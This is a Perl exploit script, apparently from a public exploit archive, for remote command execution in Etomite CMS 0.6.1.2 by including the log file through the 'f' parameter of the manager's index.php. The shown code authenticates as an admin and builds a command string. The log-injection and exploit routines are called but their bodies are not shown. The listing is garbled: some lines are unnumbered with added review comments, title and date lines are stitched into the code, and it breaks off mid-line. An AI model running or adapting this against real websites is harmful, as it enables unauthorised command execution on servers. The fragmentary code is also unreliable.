1 #!/usr/bin/perl −w
2 #
3 # Etomite CMS Remote Command Execution
4 # Version: 0.6.1.2
5 # Url: http://www.etomite.org
6 # Author : Alfredo Pesoli ’revenge’
7 # Description:
8 #
9 # Input passed to the 'f' parameter in "/manager/index.php" isn't properly verified before being used in an include function. This can be exploited to include local files on the target host or to execute commands; admin credentials are needed to exploit this vulnerability.
10 #
11 # http://www.0xcafebabe.it
12 # <revenge@0xcafebabe.it>
13
14 use strict;
15 use IO::Socket;
16
# Driver: read the positional arguments, build the command string, then call
# authenticate() (its return value becomes the cookie), inject_logfile() and
# sploit() in that order. The bodies of the last two are not in this part of
# the listing.
# Fewer than five arguments (host, user, password, path, one command word)
# hands control to usage().
&usage() if @ARGV < 5;

# First four arguments, in order: target host, manager username, manager
# password, and the path prefix that authenticate() puts in front of
# "processors/login.processor.php".
my ( $target, $username, $password, $path ) = @ARGV[ 0 .. 3 ];

# Fixed User-Agent header value. authenticate() sends it verbatim, so it is a
# constant string to search for wherever the web server logs User-Agent.
my $uagent = "Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Debian)";

# Holds the value returned by authenticate(); empty until that call.
my $cookie = "";

# Every argument from the fifth onward is one command word. Each is prefixed
# with "+", so the result starts with "+" and contains no separating spaces.
# NOTE(review): presumably "+" stands in for a space in a URL query string;
# the code that consumes $cmd is outside this block.
my $cmd = "";
$cmd .= "+" . $_ for @ARGV[ 4 .. $#ARGV ];

# The & call form is kept as in the original: the subs are defined further
# down the file and authenticate is declared with an empty prototype.
$cookie = &authenticate();

&inject_logfile();

&sploit();
36
37 sub authenticate() {
38 my $res;
39 my $tmp;
40
41 print "\n −= Getting auth cookie =−\n\n";
42 my $sock = IO::Socket::INET−>new(Proto=>"tcp", PeerAddr=>"$target", PeerPort=>"80") or die "\n Could not connect to host\n\n";
43 my $req = "rememberme=0&location=&username=".$username."&password=".$password."&thing=&submit=Login&licenseOK=on";
44 print $sock "POST ".$path."processors/login.processor.php HTTP/1.1\r\n";
45 print $sock "Host: ".$target."\r\n";
46 print $sock "User−Agent: ".$uagent."\r\n";
47 print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\n";
48 print $sock "Accept−Language: it−it,it;q=0.8,en−us;q=0.5,en;q=0.3\r\n";
49 print $sock "Accept−Encoding: gzip,deflate\r\n";
50 print $sock "Accept−Charset: ISO−8859−1,utf−8;q=0.7,*;q=0.7\r\n";
Etomite CMS 0.6.1.2 managerindex.php Local File Include Exploit
Revenge
11/16/2006
51 print $sock "Connection: close\r\n";
52 print $sock "Referer: http: